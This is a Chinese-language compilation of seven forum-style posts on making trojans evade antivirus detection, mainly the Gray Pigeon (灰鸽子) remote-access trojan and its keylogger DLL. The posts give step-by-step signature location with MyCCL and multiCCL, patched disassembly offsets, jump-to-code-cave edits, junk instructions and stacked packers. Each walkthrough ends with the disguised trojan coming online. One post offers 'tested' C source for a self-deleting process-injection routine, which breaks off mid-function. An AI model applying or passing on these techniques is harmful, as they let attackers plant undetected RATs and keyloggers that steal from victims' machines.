免杀个人经验

免杀个人经验（精选7篇）

篇1：免杀个人经验

1.比如你定位一个特征码定位到了一个字符串上我们比如这个特征码定位到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun，遇到这个我想大家一定是修改大小写吧，但是有时候修改大小写还是被杀， 这个我们可以怎么办呢，我们可以移动位置，因为这个肯定是一个api函数的参数,我们找到那个函数然后修改下调用地址就行了。 所以有时候大家不能总用通用方法，要学会变通。

2.NOD32的疑问

前天有一个会员来问我他说它定位NOD32，定位到了资源上，这个有一个可能是你的定位有错误。这个你可以通过multiccl把资源和输入表段保护起来，然后定位，看可以定位出其他的特征码不能。

3.花指令

花指令无非是一些干扰程序调试的一些手段，当然也可以作为用来迷惑杀毒软件使杀毒软件找不到我们的特征码,从而达到免杀。

为什么大家总是喜欢用网上的一些什么花指令方法，

其实我发现其实多调用一些子程序，多加一些跳转，要比你们写花指令要好的多。 比如你写一些废话 然后通过call调用,然后在多加几个跳转。我想免杀的时间要比你们在那里对照8080汇编手册写出来的要好的多,免杀就是要靠自己去想。

4.DLL文件免杀出现重定位

大家可以参考黑防9期文章里的那篇文章，这里我不多讲了。。

5.为什我服务端做了免杀,可是生成出来被杀。

这个大家首先可以对比一下有什么不同的地方，这个我给大家一个思路，现在杀毒软件就喜欢定位有标志型意义的地方（通俗点讲版权信息），大家在做的时候因为为了保护我们的木马，所以就委屈下原作者，呵呵。版权信息给改了。 还有一个就是比如说灰鸽子,现在杀软会定位到它的一些dll文件名上,你修改完dll然后找到调用dll文件的函数，然后修改下参数即可。。。。

6.定位技巧

我总是教导大家要学会变通，可是总是没人听。比如你用MYCLL定位特征码为什么总是跟着别人学呢。别人用00填充你就用00填充，有一些杀软有反定位措施的，会判断的， 这里推荐给大家用multiCCL，它这个随机生成数据串填充。或者你在MYCLL定位的时候改一下用60都可以啊。

篇2：免杀个人经验

1：

004B3920: 64:8910      MOV FS:[EAX],EDX

004B3923: 68 35454B00    PUSH 4B4535 -------------替换处（2）

004B3928: E8 83D3FFFF    CALL 004B0CB0

004B392D: C3      RETN

004B392E: E9 E9FDF4FF    JMP 0040371C

004B3933: EB F3      JMP SHORT 004B3928

004B3935: 33C0      XOR EAX,EAX

004B3937: 5A      POP EDX

004B3938: 59      POP ECX

004B3939: 59      POP ECX

004B393A: 64:8910      MOV FS:[EAX],EDX

004B393D: 68 5D454B00    PUSH 4B455D -------------假设特征码处（1）

004B3942: 8D85 64FDFFFF    LEA EAX,SS:[EBP-29C]

004B3948: E8 4F04F5FF    CALL 00403D9C

004B394D: 8D45 FC      LEA EAX,SS:[EBP-4]

004B3950: E8 4704F5FF    CALL 00403D9C

004B3955: C3      RETN

假设特征码处（1），大家看下是不是觉得很难改，改了有些可能出错，跳转一般都不行，

我们可以试一下和（2）处交换下。看是不是是能免杀上线。如何可以吧。因为他们都是压入堆栈，我们只是换了个地址而已。

2：

004B3920: 64:8910      MOV FS:[EAX],EDX

004B3923: 68 35454B00    PUSH 4B4535

004B3928: E8 83D3FFFF    CALL 004B0CB0  ------假设特征码处（1）

004B392D: C3      RETN

004B392E: E9 E9FDF4FF    JMP 0040371C

004B3933: EB F3      JMP SHORT 004B3928

004B3935: 33C0      XOR EAX,EAX

004B3937: 5A      POP EDX

004B3938: 59      POP ECX

在看这个特征码处 ，假设跳转不行，无法上线。那么我们和下面或上面的代码交换下位置试一试。看下是否上线了，而且功能全齐吧！

还有些比较厉害的杀毒软件把你ccl或myccl生成出的特征码全都给杀了，是吧。你可以试一试加壳，再查。如果你想做无壳的。怎么办？办法还是有。你去头加区。试一试不用新加的哪个区段去CCL或MYCCL去生成特征码试一试。有些可能不行，比如黑防。

在这只是给大家介绍些经验，希望各位多多研究，多想些办法。不要放弃。肯定是有办法的。只要你肯研究我不相信你就免杀不了。

不说了，今天就到这，这只是说说经验，当然上面的方法是我自己想出来的，我不保证100%成功。只想给大家一个启发。

篇3：免杀的一些观点

对于国产的杀软好多都是你把木马文件的头部转移了,就可以免杀了!!

对于加壳.因为有些壳加了木马就不能用了.有些呢..因为大家都用.所以也以经被杀了.可是杀也是杀他的壳..

对于卡吧.NOD32.诺顿等一些比教强的杀毒软件他强处之一就是他有很强的脱壳能力,就是他可以先把你的壳脱掉在来查杀木马.所以我要是给木马加壳的话就是找一些新壳,然后先加一道壳.在载入freeRES中释放资源.然后在加一道.不行就用同样的方法,在叫一道..但是就这样也不一定能过了杀毒.

好用的壳北斗.小辉的PE加密..

更改特征码:我认为做免杀的正道还是更改特征码免杀,木马的特征码都该完了后在找两个好壳加上.那你在看看免杀长不长吧.

在做定位免杀时也不能只更改你定位出来的那个特征码.你要看程序的整体汇编含意是什么,

比如:你定位的特征码在

卡吧 [特征] 0000B585_00000003 转内存地址: 0040B585

OD载入找到卡吧特征码的位置是

0040B57C |. E8 7F89FFFF CALL 木马.00403F00

0040B581 |. 8BD0 MOV EDX,EAX

0040B583 |. B9 08BC4000 MOV ECX,木马.0040BC08 ; ASCII “KpopMon”

0040B588 |. B8 0080 MOV EAX,80000002

也就是说0040B585是0040B583指令中的一部份.(这个要是不明白我就没话可说了)

那你就看0040B583 处的指令是什么意思..

是把0040BC08处的ASCII “KpopMon”传送到寄存器ECX里.那这段你要是改的话就要到0040BC08地址处去调整他的位置.然后在回来把0040B583的指针调整就可以了.

还可以怎么改.在看0040B57C |. E8 7F89FFFF CALL 木马.00403F00

实际上现在的杀毒公司定位的特征码大部分都在CALL和JMP..上边

CALL是过程调用指令

那刚才那段OD中的指令你往上看还可以看到

0040B57C |. E8 7F89FFFF CALL 木马.00403F00

这句就是0040B57C调用00403F00中的指令.

其中CALL 木马.00403F00的位置查看00403F00的位置是

00403EFF 90 NOP

00403F00 /$ 85C0 TEST EAX,EAX

00403F02 |. 74 02 JE SHORT kk_.00403F06

00403F04 |. C3 RETN

00403F05 | 00 DB 00

00403F00上面是NOP.那你就可以把

0040B57C |. E8 7F89FFFF CALL 木马.00403F00的指针调整为

0040B57C |. E8 7F89FFFF CALL 木马.00403EFF

这样也能免杀.而且还没有改变堆栈平衡..其他的功能也决对不会有什么变化

篇4：灰鸽子vip简单免杀

工具：MyCCL复合特征码定位器 官方下载地址：www.allinhack.com/blog/

Ollydbg          这个看雪有下载 www.pediy.com

OC            官方下载地址：www.vxer.cn/hmx/

UE            这个工具华军软件园有下

Rescope          这个看雪有下载 www.pediy.com

nsAnt.exe        一个猛壳，打包给大家

免杀思路：我个人认为应该先给你的木马加壳或者加花，然后用杀毒软件杀一下，看看有那些杀毒软件杀，然后单独定位那个杀毒软件的特征码，修改特征码的时候，先直接改试试，然后如果不行再指令调换或者通用跳转法！最后加壳和加花处理，免杀就成功了！

现在瑞星的内存查杀好象不那么强了，咔吧的文件查杀是依然那么变态，而且特征码更新的很勤！nsAnt.exe这款壳很猛，加壳后只有咔吧杀，其他都过，所以我们就只定位卡巴的文件特征码！然后修改！

免杀过程：1.导出MAINDLL.DLL，然后再导出GETKEY.DLL，我们看看查杀结果,咔吧杀，江民杀，nod32杀，瑞星杀，诺顿过，金山杀！我们来给它加个壳，在看查杀的结果，只剩咔吧杀了！

咔吧的文件查杀果然是强！我们来定位特征码，用MyCCL，操作很简单，大家看我操作就可以了！

2.GETKEY.DLL咔吧文件特征码定位结果：

[特征] 0000AFB9_00000002//003dBBB9我们用oc转一下地址，注意这里要改成3d

指令调换：

003DBBB6    |. 8D45 F8      lea eax,dword ptr ss:[ebp-8]

003DBBB9        BA 06000000  mov edx,6

3.加壳在看查杀结果！全过！

4.把GETKEY.DLL导回到MAINDLL.DLL，在看看MAINDLL.DLL的查杀情况，咔吧是不杀的，其他的我们只要加个壳就过了！

5.MAINDLL.DLL导回到Setup.exe，看看查杀结果，咔吧还是杀的，定咔吧的特征码，然后改掉！在加壳就都过了！

6.Setup.exe咔吧文件特征码定位结果：

[特征] 0000BD6A_00000004//1314C96A

[特征] 0000C202_00000004//1314CE02 和刚才定的不太一样，因为有的时候，你分块不同结果也可能不同！

一共有两处都需要改！

第一处，[特征] 0000BD6A_00000004//1314C96A

1314C967        A1 50E91413  mov eax,dword ptr ds:[1314E950]

1314C96C        50        push eax

指令顺序调换，就可以了！

第二处，[特征] 0000C202_00000004//1314CE02

大小写替换一下就可以了！我们定位的结果是很准的，看咔吧不杀了吧！

7.最后加壳，看免杀效果，瑞星的内存是过的！看看能不能上线！看瑞星的内存查杀已经不那么强了，我们并没有去定为内存！好了，都过了，

希望大家都能有自己免杀的鸽子！

篇5：已测试通过的免杀代码

//hi.baidu.com/zxhouse

#include

BOOL DeleteMyself(WCHAR *pHelper)

{

int ret;

WCHAR helper[MAX_PATH];

ZeroMemory(helper, sizeof(helper));

if (pHelper)

wcsncpy(helper, pHelper, MAX_PATH-2);

else

wcscpy(helper, L”calc.exe“);

STARTUPINFOW si = {sizeof(STARTUPINFOW),0};

PROCESS_INFORMATION pi;

HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());

if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))

{

CONTEXT ctx = {CONTEXT_FULL,0};

ret = GetThreadContext(pi.hThread, &ctx);

WCHAR MyselfPath[MAX_PATH];

int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);

struct StackContext

{

DWORD_PTR DeleteFileW;

DWORD_PTR WaitForSingleObject_argv1;

DWORD_PTR WaitForSingleObject_argv2;

DWORD_PTR ExitProcess;

DWORD_PTR DeleteFileW_argv1;

DWORD_PTR shit;

DWORD_PTR ExitProcess_argv1;

}stackctx;

HMODULE hKernel32 = GetModuleHandleW(L”Kernel32.dll“);

ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, ”WaitForSingleObject“);

ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

ctx.Esp += 256*1024;

stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, ”DeleteFileW“);

stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;

stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;

stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, ”ExitProcess");

stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);

if (!ret) return FALSE;

stackctx.shit = 0;

篇6：简单的过瑞星免杀技巧

定位特征码免杀后很快就不免杀了，

如果说你加壳吧，又没什么壳可以直接过瑞星。

下面我给大家共享下我个人改壳过瑞星的方法了。

推荐加壳工具下载地址：www.heibai.net/download/Class/Class_338_Time_1.htm

方法：

1.先给你的木马加个SimplePack壳

2.OD载入，

3.把第一句改成 NOP ，保存!

4.用你的瑞星杀下。

篇7：教程之灰鸽子VIP终极免杀技术

教程之灰鸽子VIP2006终极免杀技术

。这次教程主要以灰鸽子VIP2006服务端为例！现在网上很多免杀教程，我也看过很多，但是免杀效果都不是很好，用不几天就被杀了，所以真正免杀的鸽子，还是修改杀毒软件的特征码。这样免杀效果才更好，能达到长期免杀。今天这节课主要给大家讲过卡巴内存免杀和外表免杀，达到总体免杀，只要你学会了这种方法，以后自己做属于自己的DIY免杀鸽子就可以啦！好了废话不多说了，大家就好好看我操作吧！这是我已经生成好的VIP2006服务端，下面我们开始把服务端的需要做免杀的DLL

导出来！

这就是鸽子VIP2006服务端程序.exe→MAINDLL.dll→GETKEY.dll 大家看到了吧，2006少了一个hook.dll文件。以前VIP里有HOOK。DLL文件，现在2006里没有拉！这样做免杀就方便了一些！我们先把卡巴病毒库升级到最新的，然后在用卡巴查一下我们需要做免杀的这3个文件。看到了吧，都被列为黑名单了。

介绍一下卡巴的威力吧，卡巴我个人感觉是现在杀毒软件最牛的啦。呵呵不做广告啦。

我们先做GETKEY。DLL也就是键盘记录钩子。下面看我操作吧，先来一次大定位，第一次先定位5秒1000字节吧，只要是被报毒的，我们就选择。然后进行第2次定位，5秒32字节，看好我的操作哦，别忘了删掉上次定位的。好保存结果，然后再来一次详细的8字节定位，这样能提高免杀效率。OK定位搞顶啦，然后我们去用C32工具来修改特征码可以用大小写修改法，也可以用跳转法，具体用什么，我们先去看看吧。看到了吧，有字母，那我们就用UE来该大小写字母吧，我们来杀下毒吧，文件不报毒了，看看内存呢，用OLB载入内存。被杀了，说明定位的还是不够准，那咱在来一次详细准确的4字节定位，呵呵，看来还有个来，继续。

OK最后一次详细定位结果出来啦，我们去保存一下。我们来分析一下结果吧，第一个大小60吧，下面的都一样吧，那我们就来选择第一个，去修改特征码，用跳转法，看我操作吧，用C32工具，找到0000B1CA大概就是这里拉，大家如果不懂16进制的话，可以找UE看哦，继续，我们把这段NOP掉，然后去下面找到程序空隙，也就是0000区吧：

0000B1CB: 68 E4BE4000 PUSH 40BEE4

0000B1D0: E8 A7FBFFFF CALL 0000AD7C

--------------------------------------------------0000B1D5

新入口点 JMP 0000B916 也就是返回上面的意思吧 呵呵 不好意思这里因该JMP 0000B1D5 OK保存一下，我们来查下毒吧，文件不报警拉，我们内存查杀，因该找到我们刚刚保存的那个DLL，OK内存已经免杀了，我们现在看看导回服务端能不能上线。

把备份的删掉就可以了啦，现在我们传到空间上去，然后用虚拟即运行，我们改成keymiansha.exe传到空间吧，打开虚拟主机，上传完毕啦，等一下哦，虚拟机启动慢你可以快进一下观看。打开鸽子VIP2006等待上线，刚刚上线的这些不是哦，我专门的分组拉，等一等哦，先喝杯咖啡吧，呵呵。

好拉，我们进去下载刚刚上传的KEY免杀服务端吧。因为上次做实验吧，还忘了卸载看好拉，我把他卸掉。OK，哈哈上线拉，我们看看功能吧。功能都可以，好啦，我们卸掉它吧。

KEYDLL免杀到次结束，下面将MAINDLL.DLL免杀！

现在我们该给MAINDLL.DLL做免杀了，我们先来给他做文件免杀，如果文件免杀完成，我们再载入OLB内存中，用卡巴查杀，如果能不被杀，那说明卡巴的文件病毒特征码就和文件一样大，好我们还是来定位MAINDLL，

DLL吧。先来一次大定位，下面看我操作吧，不打字拉，看我调CCL哦，第一次文件定位 ，我们以生成500替换1000字节。因为MAINDLL.DLL文件600多K吧，为了节省时间，我们就定位大一点，好拉定位完成，我们来杀毒。大家可以快进一下，因为杀毒有点慢，继续第2论定位，再来一次8字节定位。刚才的32字节还没杀毒呢，继续杀毒，好结果终于出来拉，我们用C32来搞跳转法。找这个000852D0，呵呵不好意思哈打错拉，因该打开这个哦，找到啦，我们去下面找空隙：

000852CE: 8B55 F8 MOV EDX， [DWORD SS:EBP-8]

000852D1: 8B45 FC MOV EAX， [DWORD SS:EBP-4]

000852D4: E8 03FBFFFF CALL 00084DDC

-------------------------------------------------------JMP 000852D9

新入口点 00085C10 跳转法完毕，我们保存一下，查毒，文件查杀已经过拉，我们来内存查杀。哈哈内存也过拉，现在我们要导回服务端，，，看看能不能上线。还是传到我地空间，然后上虚拟主机试验。呵呵捎等一下，有时候就这样，OK上来拉，速度有点慢哦，耐心等一下吧，虚拟主机慢啊，，，大家可以快进一下哦。下面做的就是测试能不能上线拉，把鸽子VIP2006打开，等待上线。消失了，看看能上线吧？OK可以上线，到此结束，下面讲服务端免杀。

上面已经完成服务端内核了，这里主要给大家做服务端的免杀！OK。废话少说，我们来做服务端免杀。先把上节课做的免杀的MAINDLL.DLL导入没有做免杀的服务端里，大家看我来演示。我们先来一次大提定位吧，更新下病毒库，再准确的来一次定位，看到了吧，还有2组，我们再来一次8字节定位，我们来修改0000BBB5这段中的8个字节。有RETN的地方我们就不修改，把复制的这段NOP掉，然后去下面找程序空隙，OK汇编完成，保存一下。

0000BBB8: 57 PUSH EDI

0000BBB9: 696E 5F 39780000 IMUL EBP，[ESI+5F]，7839

0000BBC0: 53 PUSH EBX

0000BBC1: 6F OUTS DX，DWORD PTR ES:[EDI]

--------------------------------------------------0000BBC2

新如口点0000C1DE

用卡巴查杀一下，看看，呵呵看到了吧，不报毒了，我们再内存查杀一下，看看，有点卡，耐心等待一下哦。看到了吧，内存也不报毒了，下面我们到虚拟主机上测试一下看看能不能上线，先把做好的免杀服务端传到我的空间上去。去虚拟主机，启动有点慢。